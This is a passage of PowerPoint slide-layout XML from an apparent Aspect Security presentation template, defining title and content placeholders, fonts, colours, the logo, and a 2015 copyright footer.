                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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23_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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24_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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25_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
